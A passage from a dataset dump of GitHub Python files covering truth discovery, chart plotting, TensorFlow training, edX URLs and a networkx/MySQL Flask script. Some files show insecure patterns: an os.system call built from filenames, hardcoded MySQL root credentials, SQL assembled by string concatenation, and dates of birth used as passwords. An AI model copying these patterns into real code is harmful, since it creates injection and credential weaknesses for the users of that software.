object_claim_count_dict.keys():\n object_claim_count_dict[key2] = dict()\n if key1 not in object_claim_count_dict[key2].keys():\n object_claim_count_dict[key2][key1] = 0\n for key3 in claimDict[key1].keys():\n if claimDict[key1][key3] == \"1\":\n object_claim_count_dict[key2][key1] += 1\n return object_claim_count_dict\n\n def generate_truth_dict(objectClaimDict):\n truth_dict = dict()\n for key1 in objectClaimDict.keys():\n if key1 not in truth_dict.keys():\n truth_dict[key1] = list()\n max_value = 0\n for key2 in objectClaimDict[key1].keys():\n if objectClaimDict[key1][key2] > max_value:\n max_value = objectClaimDict[key1][key2]\n for key2 in objectClaimDict[key1].keys():\n if objectClaimDict[key1][key2] == max_value:\n truth_dict[key1].append(key2)\n return truth_dict\n\n def write_truth_dict(factDict, truthDict):\n dataWriteList = list()\n for key1 in truthDict.keys():\n dataWriteLine = key1 + \"\\t\"\n for key2 in truthDict[key1]:\n dataWriteLine = dataWriteLine + factDict[key2][key1] + \";\"\n dataWriteLine = dataWriteLine.strip(\";\") + \"\\n\"\n 
dataWriteList.append(dataWriteLine)\n return dataWriteList\n\n factDict = dict()\n claimDict = dict()\n\n global folder_write\n if dataset == 1: # movie\n folder_write = \"movie\"\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"factDB_movie\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"claimDB_movie\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n elif dataset == 0:\n folder_write = \"book\"\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"factDB_book\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=os.path.join(datasetPath, folder_write, \"claimDB_book\"), mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n elif dataset == -1: # this is for testing\n folder_write = \"test\"\n dataFile = open(file=test_fact_path, mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_fact_dict(factDict, dataWrite)\n dataFile.close()\n\n dataFile = open(file=test_claim_path, mode=\"r\", encoding=\"utf-8\")\n dataLines = dataFile.readlines()\n for dataLine in range(len(dataLines)):\n dataWrite = dataLines[dataLine].strip(\"\\n\")\n if not dataLine == 0:\n generate_claim_dict(claimDict, dataWrite)\n dataFile.close()\n\n start = time.time()\n objectClaimDict = generate_object_claim_dict(factDict, claimDict)\n truthDict = generate_truth_dict(objectClaimDict)\n dataWriteList = write_truth_dict(factDict, truthDict)\n used_time = time.time() - start\n result_write = open(file=outputWritePath + \"/\" + folder_write + \"/\" + \"truth_result_MV_\" + folder_write, mode=\"w\", encoding=\"utf-8\")\n result_write.write(\"OID\\tInferTruth\\n\")\n result_write.writelines(dataWriteList)\n result_write.close()\n\n result_write = open(file=\"./\" + \"journal_\" + folder_write, mode=\"a+\", encoding=\"utf-8\")\n result_write.write(\"Experiment on \" + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M') + \"\\n\")\n result_write.write(\"Total Time : \" + str(used_time) + \"\\n\")\n result_write.close()\n\n\"\"\"\nMV(1, \"../DataToUse/movie\", \"./\")\nMV(0, \"../DataToUse/book\", \"./\")\n\"\"\"","repo_name":"yishangru/TruthDiscovery","sub_path":"MajorityVote/MV.py","file_name":"MV.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"37844373174","text":"import datetime\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom tabledef import *\nimport pandas as pd\nimport sys\n\nengine = create_engine('sqlite:///tutorial.db', echo=True)\n\n# create a 
Session\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# user = User(\"admin\",\"password\")\n# session.add(user)\n\npd.options.display.max_rows = 999\n\ndf = pd.read_excel('masters-final.xlsx')\nprint(len(df))\n\nfor i in range(len(df)):\n    r=df['REG.NO'][i]\n    d=df['Date of Birth'].dt.date[i]\n    r=str(r)\n    d=str(d)\n    user = User(r,d)\n    session.add(user)\n    session.commit()\n    print(r,\"\\n\",d)\n\n#user = User(\"python\",\"python\")\n#session.add(user)\n\nuser = User(\"umesh\",\"umesh\")\nsession.add(user)\n\n# commit the record to the database\nsession.commit()\n","repo_name":"umeshkumarS/masters-python","sub_path":"dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33620804244","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport posixpath\nimport json\nimport time\nimport os\nimport config\n\nfrom location import DLLocation\nfrom collections import defaultdict\n\n\nroot_file_path = posixpath.join(os.path.dirname(__file__), 'config')\n\nclass digital_lync_chart:\n    def __init__(self, location=''):\n        if location:\n            self.loc = location\n        else:\n            self.loc = DLLocation().location\n        self.list_of_courses = config.DigitalLoc().courses\n        self.student_config_path = posixpath.join(root_file_path, 'students', '{}.json'.format(self.loc))\n        if os.path.exists(self.student_config_path):\n            student_fp = open(self.student_config_path, 'r')\n            self.student_stat_dict = json.load(student_fp)\n            student_fp.close()\n        else:\n            self.student_stat_dict = {}\n        self.mentor_config_path = posixpath.join(root_file_path, 'mentors', self.loc + '.json')  # was '/mentors'; a leading slash makes posixpath.join discard root_file_path\n        if os.path.exists(self.mentor_config_path):\n            mentor_fp = open(self.mentor_config_path, 'r')\n            self.mentor_stat_dict = json.load(mentor_fp)\n            mentor_fp.close()\n        else:\n            self.mentor_stat_dict = {}\n        self.fig, self.ax = plt.subplots()\n\n\n    def get_total_student_count(self):\n        return len(self.student_stat_dict)\n\n    def get_total_mentor_count(self):\n        return len(self.mentor_stat_dict)\n\n    def get_student_course_count(self):\n        student_course_count_dict = {}\n        for course_item in self.list_of_courses:\n            student_course_count_dict[course_item] = 0\n            if not self.student_stat_dict:\n                continue\n            for student_item in self.student_stat_dict:\n                if course_item.lower() in self.student_stat_dict[student_item]['__courses_opted']:\n                    student_course_count_dict[course_item] += 1\n                else:\n                    continue\n        return student_course_count_dict\n\n    def plot_student_chart(self):\n        print(\"Plotting Student chart...\")\n        course_label = []\n        course_size = []\n        for item, count in self.get_student_course_count().items():\n            course_label.append(item)\n            course_size.append(count)\n        plt.rc('font', size=8)\n        self.fig.set_size_inches(12.0, 5.0)\n        y_pos = np.arange(len(course_label))\n        self.ax.barh(y_pos, course_size, align='center', alpha=0.5, color='green')\n        self.ax.set_yticks(y_pos)\n        self.ax.set_yticklabels(course_label)\n        self.ax.set_ylabel('Courses')\n        self.ax.invert_yaxis()\n        self.ax.set_xlabel('Number Of Students (Total: {})'.format(str(self.get_total_student_count())))\n        self.ax.set_title('Digital Lync Student')\n        plt.savefig('./assets/stat_data/student_count_bar.png')\n        time.sleep(2)\n        # plt.show()\n\n    def plot_mentor_chart(self):\n        pass\n\n\nif __name__ == \"__main__\":\n    inst = digital_lync_chart()\n    inst.plot_student_chart()\n","repo_name":"devottam2485/diglyn","sub_path":"DLStatData.py","file_name":"DLStatData.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38031339093","text":"import numpy as np\nimport os\ndef getDirectedSpanningTree(edgeList,N,fname,resultFile,mstwrapperloc='./'):\n\t#Append to beginning of file\n\tf = open(fname,'w')\n\tf.write(str(N)+\"\\n\")\n\tnp.savetxt(f,edgeList,delimiter=',',fmt=['%d','%d','%d'])\n\tf.close()\t\n\tos.system(mstwrapperloc+'mstwrapper '+fname+' '+resultFile)\nif __name__ == '__main__':\n\tt = np.zeros((3,3))\n\tt[0,:]=np.array([1,2,12])\n\tt[1,:]=np.array([2,3,321])\n\tt[2,:]=np.array([3,1,5])\n\tgetDirectedSpanningTree(t,3,'smallTest.txt','smallResult.txt')\n","repo_name":"rahulk90/dir_mst_wrapper","sub_path":"directedMST.py","file_name":"directedMST.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12613628463","text":"\"\"\"\nURLs for the credit app.\n\"\"\"\n\n\nfrom django.urls import include, path, re_path\n\nfrom openedx.core.djangoapps.credit import models, routers, views\n\nPROVIDER_ID_PATTERN = fr'(?P<provider_id>{models.CREDIT_PROVIDER_ID_REGEX})'\n\nPROVIDER_URLS = [\n    path('request/', views.CreditProviderRequestCreateView.as_view(), name='create_request'),\n    re_path(r'^callback/?$', views.CreditProviderCallbackView.as_view(), name='provider_callback'),\n]\n\nV1_URLS = [\n    re_path(fr'^providers/{PROVIDER_ID_PATTERN}/', include(PROVIDER_URLS)),\n    path('eligibility/', views.CreditEligibilityView.as_view(), name='eligibility_details'),\n]\n\nrouter = routers.SimpleRouter()  # pylint: disable=invalid-name\nrouter.register(r'courses', views.CreditCourseViewSet)\nrouter.register(r'providers', views.CreditProviderViewSet)\nV1_URLS += router.urls\n\napp_name = 'credit'\nurlpatterns = [\n    path('v1/', include(V1_URLS)),\n]\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/credit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"29258218737","text":"import maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.mvrp_checker as mvrp_checker\nimport maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.tools as tools\nimport json\n\n\ndef test_custom_cost():\n    request = tools.get_test_json(\"custom_cost.json\")\n    response1 = mvrp_checker.solve_and_check(\n        json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n    request[\"vehicles\"][0][\"cost\"] = (\n        \"(150 * duration_h + 10 * distance_km + 100 * locations + 3000) + \"\n        \"(120 * trailer_duration_h + 12 * trailer_distance_km + 2000 * trailer_used)\"\n    )\n    response2 = mvrp_checker.solve_and_check(\n        json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n    for key in response1[\"metrics\"]:\n        if key not in [\n            \"operations_per_second\",\n            \"total_duration_cost\",\n            \"total_fixed_cost\",\n            \"total_locations_cost\",\n            \"total_runs_cost\",\n            \"total_transit_distance_cost\",\n            \"total_custom_cost\",\n        ]:\n            assert tools.is_abs_close(response1[\"metrics\"][key], response2[\"metrics\"][key], 1e-6)\n\n\ndef test_payout():\n    # Solve a problem in which, by the formulas, the payout and the cost differ by exactly 10000\n    request = tools.get_test_json(\"custom_cost.json\")\n\n    cost_string = (\n        \"(150 * duration_h + 10 * distance_km + 100 * 
locations + 3000) + \"\n \"(120 * trailer_duration_h + 12 * trailer_distance_km + 2000 * trailer_used)\"\n )\n payout_string = cost_string + \" + 10000\"\n\n request[\"vehicles\"][0][\"cost\"] = cost_string\n request[\"vehicles\"][0][\"payout\"] = payout_string\n\n response = mvrp_checker.solve_and_check(\n json.dumps(request), None, solver_arguments={'sa_iterations': 10000})\n\n assert tools.is_abs_close(response[\"metrics\"][\"total_custom_cost\"] + 10000, response[\"metrics\"][\"total_payout\"], 1e-6)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests_fast/test_custom_cost.py","file_name":"test_custom_cost.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5045375408","text":"from django.urls import path\nfrom .views import ItemsListView, FilterPhoneItemView, FilterNotebookItemView, main_index\n\nurlpatterns = [\n path('', main_index, name='index'),\n # path('', StartPageView.as_view(), name='index'),\n path('items/', ItemsListView.as_view(), name='items-list'),\n path('items/phone', FilterPhoneItemView.as_view(), name='phone-list'),\n path('items/notebook', FilterNotebookItemView.as_view(), name='notebook-list'),\n\n]\n","repo_name":"semen-ksv/test_scraping_site_django_api","sub_path":"citrys_scraping/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25812979800","text":"import unittest\nfrom ReplicatorReceiver.Logger import Logger\nfrom unittest.mock import patch, mock_open\nfrom assets.helper import CODE\nfrom datetime import datetime\n\n\nclass TestFileWriter(unittest.TestCase):\n\n def test_file_writer(self):\n fake_file_path = \"fake/file/path\"\n content = \"sdadasdada\"\n with patch('ReplicatorReceiver.Logger.open', mock_open()) as mocked_file:\n Logger(\"milos\").write_in_file(fake_file_path, content)\n\n # assert if opened file on write mode 'w'\n mocked_file.assert_called_once_with(fake_file_path, 'a')\n\n # assert if write(content) was called from the file opened\n # in another words, assert if the specific content was written in file\n mocked_file().write.assert_called_once_with(content)\n\n def test_logg_send_codes(self):\n test_code = CODE(CODE.CODE_ANALOG)\n test_value = 1111\n test_value1 = -1111\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n test_writerid = 111\n test_writerid1 = -111\n\n self.assertEqual(None, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value, test_datetime, test_writerid))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value1, test_datetime, test_writerid))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value, test_datetime, test_writerid1))\n self.assertRaises(Exception, Logger.LoggSentCodes(Logger(\"TestiranjeLOGGER\\\\test1\"), test_code, test_value1, test_datetime, test_writerid1))\n\n def test_logg_stored_codes(self):\n test_code = CODE(CODE.CODE_ANALOG)\n test_value = 1111\n test_value1 = -1111\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n\n self.assertEqual(None, Logger.LoggStoredCodes(Logger(\"TestiranjeLOGGER\\\\test2\"), test_code, test_value, test_datetime))\n\n self.assertRaises(Exception, Logger.LoggStoredCodes(Logger(\"TestiranjeLOGGER\\\\test2\"), test_code, test_value1, test_datetime))\n\n 
def test_logg_activity(self):\n test_activity = \"sasdasa\"\n test_activity1 = \"\"\n test_datetime = datetime.now().strftime(\"%d-%m-%y %H:%M:%S\")\n\n self.assertEqual(None, Logger.LoggActivity(Logger(\"TestiranjeLOGGER\\\\test3\"), test_activity, test_datetime))\n\n self.assertRaises(Exception, Logger.LoggActivity(Logger(\"TestiranjeLOGGER\\\\test3\"), test_activity1, test_datetime))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Pantex9/RES-projekat-tim13","sub_path":"ReplicatorReceiver/testiranje/TestiranjeLOGGER/testiranjeLogger.py","file_name":"testiranjeLogger.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74153147282","text":"import numpy as np\nimport math\n'''\nDescription: A Dictionary of all the Regions in the Maze with their region Area, HexaPod tilt in the X,Y direct,PID Values, and Specified target\nNote: Ramp is divided into two parts since its angle lies between 0-4 degrees and 356-360 degrees\n'''\nOrigin_X=53 #Origin of the X Axis which is located in th center of the Maze\nOrigin_Y=46 #Origin of the Y Axis which is located in th center of the Maze\n\nconvert=math.pi/180 # Conversion from degrees to radians\n#PID Values for the two regions around the target region of the first ring\nP_1=.01\nI_1=0.09\nD_1=1.05\n#PID Values for the two regions farthest from the first ring target\nP_out=.0008\nI_out=0.1\nD_out=0.05\n#PID Values for the 2nd ring\nP_2=0.01\nI_2=0.07\nD_2=.9\n#PID Values for the 3rd ring\nP_3=0.009\nI_3=0.07\nD_3=.95\n#PID Values for the 4th ring\nP_4=0.01\nI_4=0.1\nD_4=.95\n#Note: The entrance regions and ramps have targets and PIDS but are not used because in the code, those special Regions just go straight to their target position jsut to knock the ball in quickly\nRegion = {\n \"Ring1_1\" :{\"Area\":[38,47,82,97],#[Inner Diameter, Outer Diameter, Min Angle, Max Angle]\n \"X_pos\":-1,#Hexapod X tilt\n \"Y_pos\":-5,#Hexapod Y tilt\n \"P Gain\":0.01,#P Value in PID\n \"I Gain\":0.00,# I Value in PID\n \"D Gain\":0.00,# D Value in PID\n \"Target\":[int(30*math.cos(-89*convert)+Origin_X),int(30*math.sin(-89*convert)+Origin_Y)]},# Taget position of the ball\n #Note:Each ring has the same target except for the entrance regions (which as stated above aren't used)\n \"Ring1_2\" :{\"Area\":[40,47,94,195],\"X_pos\":.5,\n \"Y_pos\":4,\n \"P Gain\":P_1,\n \"I Gain\":I_1,\n \"D Gain\":D_1,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_3\" :{\"Area\":[40,47,193,270],\"X_pos\":-5,\n \"Y_pos\":2,\n \"P Gain\":P_out,\n \"I Gain\":I_out,\n \"D Gain\":D_out,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_5\" :{\"Area\":[41,47,0,84],\"X_pos\":-.5,\n \"Y_pos\":4,\n \"P Gain\":P_1,\n \"I Gain\":I_1,\n \"D Gain\":D_1,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ring1_4\" :{\"Area\":[40,47,270,360],\"X_pos\":4,\n \"Y_pos\":2,\n \"P Gain\":P_out,\n \"I Gain\":I_out,\n \"D Gain\":D_out,\n \"Target\":[int(47*math.cos(-89*convert)+Origin_X),int(47*math.sin(-89*convert)+Origin_Y)]},\n \"Ramp0_1\" :{\"Area\":[10,40,0,4],\"X_pos\":14,\n \"Y_pos\":1,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D Gain\":0.0,\n \"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \"Ramp0_2\" :{\"Area\":[10,40,356,360],\"X_pos\":14,\n \"Y_pos\":1,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D 
Gain\":0.00,\n \"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \"Ring2_1\" :{\"Area\":[30,38,6,80],\"X_pos\":-4,\n \"Y_pos\":1,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_3\" :{\"Area\":[29,39,167,190],\"X_pos\":5,\n \"Y_pos\":-1.5,\n \"P Gain\":.1,\n \"I Gain\":0.1,\n \"D Gain\":0,\n \"Target\":[int(22*math.cos(-178*convert)+Origin_X),int(22*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_2\" :{\"Area\":[30,39,80,169],\"X_pos\":-5,\n \"Y_pos\":-.2,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_4\" :{\"Area\":[31,39,189,300],\"X_pos\":-5,\n \"Y_pos\":.2,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring2_5\" :{\"Area\":[31,39,300,353],\"X_pos\":-5,\n \"Y_pos\":-3,\n \"P Gain\":P_2,\n \"I Gain\":I_2,\n \"D Gain\":D_2,\n \"Target\":[int(38*math.cos(-178*convert)+Origin_X),int(38*math.sin(-178*convert)+Origin_Y)]},\n \"Ring3_4\" :{\"Area\":[21,29,259,288],\"X_pos\":-1.5,\n \"Y_pos\":5,\n \"P Gain\":.2,\n \"I Gain\":0.1,\n \"D Gain\":0,\n \"Target\":[int(12*math.cos(-273*convert)+Origin_X),int(12*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_3\" :{\"Area\":[21,29,166,260],\"X_pos\":.1,\n \"Y_pos\":-5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_2\" :{\"Area\":[21,29,80,166],\"X_pos\":-5,\n \"Y_pos\":-.5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_1\" :{\"Area\":[21,29,6,80],\"X_pos\":-1,\n \"Y_pos\":5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring3_5\" :{\"Area\":[21,29,288,349],\"X_pos\":-.1,\n \"Y_pos\":-5,\n \"P Gain\":P_3,\n \"I Gain\":I_3,\n \"D Gain\":D_3,\n \"Target\":[int(29*math.cos(-273*convert)+Origin_X),int(29*math.sin(-273*convert)+Origin_Y)]},\n \"Ring4_4\" :{\"Area\":[12,20,70,110],\"X_pos\":0,\n \"Y_pos\":-10,\n \"P Gain\":.3,\n \"I Gain\":0.2,\n \"D Gain\":0,\n \"Target\":[int(0*math.cos(-90*convert)+Origin_X),int(0*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_3\" :{\"Area\":[14,20,110,200],\"X_pos\":1,\n \"Y_pos\":5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_2\" :{\"Area\":[14,21,200,294],\"X_pos\":-5,\n \"Y_pos\":1,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_1\" :{\"Area\":[14,21,294,348],\"X_pos\":-5,\n \"Y_pos\":-.5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring4_5\" :{\"Area\":[13,20,18,70],\"X_pos\":-1,\n \"Y_pos\":5,\n \"P Gain\":P_4,\n \"I Gain\":I_4,\n \"D Gain\":D_4,\n \"Target\":[int(20*math.cos(-90*convert)+Origin_X),int(20*math.sin(-90*convert)+Origin_Y)]},\n \"Ring5_1\" :{\"Area\":[0,12,0,360],\"X_pos\":14,\n \"Y_pos\":0,\n \"P Gain\":0,\n \"I Gain\":1,\n \"D Gain\":0,\n 
\"Target\":[int(47*math.cos(0*convert)+Origin_X),int(47*math.sin(0*convert)+Origin_Y)]},\n \n}\n","repo_name":"EliasNavarro/Hexy","sub_path":"Region_Dictionary.py","file_name":"Region_Dictionary.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34690824370","text":"list=[1,2,3,4,5,6,7,8,9,10]\nlist.reverse()\ni=0\na=1\nn=[]\nwhile i `float32`.\"\"\"\n return (tf.cast(image, tf.float32) / 255., label)\n\n # def dataset_fn():\n # return ds_train.map(normalize_img, num_parallel_calls=tf.data.AUTOTUNE).batch(global_batch_size).prefetch(tf.data.AUTOTUNE)\n\n # input = tf.keras.utils.experimental.DatasetCreator(dataset_fn=dataset_fn)\n\n ds_train = ds_train.map(normalize_img, num_parallel_calls=tf.data.AUTOTUNE).shuffle(20).repeat()\n ds_train = ds_train.batch(global_batch_size)\n ds_train = ds_train.prefetch(tf.data.AUTOTUNE)\n\n options = tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n\n ds_train = ds_train.with_options(options)\n\n # model = tf.keras.models.Sequential([\n # tf.keras.layers.Flatten(input_shape=(28, 28)),\n # tf.keras.layers.Dense(64, activation='relu'),\n # tf.keras.layers.Dense(128, activation='relu'),\n # tf.keras.layers.Dense(62)\n # ])\n\n # model.compile(\n # optimizer=tf.keras.optimizers.Adam(0.0001),\n # loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n # metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],\n # )\n\n\n variable_partitioner = (\n tf.distribute.experimental.partitioners.MinSizePartitioner(\n min_shard_bytes=(256 << 10),\n max_shards=2))\n\n strategy = tf.distribute.ParameterServerStrategy(\n cluster_resolver=tf.distribute.cluster_resolver.TFConfigClusterResolver(),\n variable_partitioner=variable_partitioner\n )\n\n with strategy.scope():\n model = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(62)\n ])\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(0.0001),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],\n )\n\n\n\n model.fit(\n ds_train,\n epochs=10,\n steps_per_epoch=100\n #validation_data=ds_test,\n )\n\n\n\nif tf_config[\"task\"][\"type\"] == \"ps\":\n print(\"3\")\n server()\nelif tf_config[\"task\"][\"type\"] == \"worker\" and tf_config[\"task\"][\"index\"] != 0:\n print(\"4\")\n controller()\n\nif tf_config[\"task\"][\"type\"] == \"worker\" and tf_config[\"task\"][\"index\"] == 0:\n controller()","repo_name":"ilmal/GA","sub_path":"mnist_ps/mnist_ps.py","file_name":"mnist_ps.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35854120343","text":"import json\r\nimport time\r\nimport random\r\nimport networkx as nx\r\nfrom networkx.readwrite import json_graph\r\nimport pymysql\r\nfrom flask import jsonify,request\r\n\r\ndef avggene(gene):\r\n \r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n cur.execute('select * from jsondata where generation=%d' %gene)\r\n mydata = cur.fetchall()\r\n mydata = mydata[0][1]\r\n mydata = json.loads(mydata)\r\n G = json_graph.node_link_graph(mydata)\r\n\r\n avg_degree=calavgdegree(G)\r\n 
avg_path=calavgpath(G)\r\n avg_cluster=calavgcluster(G)\r\n histogramtostr=calhistogram(G)\r\n\r\n tsql = \"insert into graphcaldata(avgdegree,avgpath,avgcluster,generation) values(%f,%f,%f,%d)\" %(avg_degree,avg_path,avg_cluster,gene)\r\n cur.execute(tsql)\r\n \r\n tsql2 = \"update graphcaldata set histogram='\"+histogramtostr+\"' where generation=%d\" %(gene)\r\n cur.execute(tsql2)\r\n conn.commit()\r\n\r\n\r\ndef calhistogram(G):\r\n degree_list=list(nx.degree_histogram(G))\r\n histogramtostr= str(degree_list)\r\n #print(histogramtostr)\r\n return histogramtostr\r\n\r\n\r\n\r\ndef calavgdegree(G):\r\n \r\n degree_list=list(nx.degree_histogram(G))\r\n #print(degree_list)\r\n avg_degree=0\r\n for i in range(len(degree_list)):\r\n avg_degree += i*(degree_list[i])\r\n avg_degree=avg_degree / G.number_of_nodes()\r\n return avg_degree\r\n\r\n\r\ndef calavgpath(G):\r\n degree_list=list(nx.degree_histogram(G))\r\n if (degree_list[0]==0):\r\n try:\r\n avg_path=nx.average_shortest_path_length(G)\r\n except Exception:\r\n print('average_shortest_path_length failed: graph is probably disconnected')\r\n avg_path= 999 # sentinel value for graphs with no finite average path\r\n else:\r\n avg_path= 999\r\n return avg_path\r\n\r\n\r\ndef calavgcluster(G): \r\n avg_cluster=nx.average_clustering(G)\r\n return avg_cluster\r\n\r\n\r\n\r\ndef last_json(last_jsondata,last_graphdata,last_nodedata):\r\n\r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n \r\n # cur.execute('select * from jsondata order by id desc limit 1')\r\n # data1 = cur.fetchall()\r\n # maxgen = data1[0][2]\r\n # lastdata = data1[0][1]\r\n #maxgen =last_jsondata[0][2]\r\n lastdata =last_jsondata[0][1]\r\n\r\n lastdata = '{\"series\":[{\"type\":\"graph\",\"layout\":\"force\",\"roam\":true,\"force\":{\"repulsion\":200},\"draggable\":true,'+lastdata[1:]\r\n lastdata = lastdata+']}'\r\n \r\n #cur.execute('select * from graphcaldata order by generation desc limit 1')\r\n #graphdata = cur.fetchall()\r\n graphdata=last_graphdata\r\n\r\n last_avgdegree= graphdata[0][0]\r\n last_avgpath= graphdata[0][1]\r\n last_avgcluster= graphdata[0][2]\r\n last_histogram= graphdata[0][4]\r\n last_strtojson=json.loads(lastdata)\r\n\r\n\r\n #cur.execute('select * from 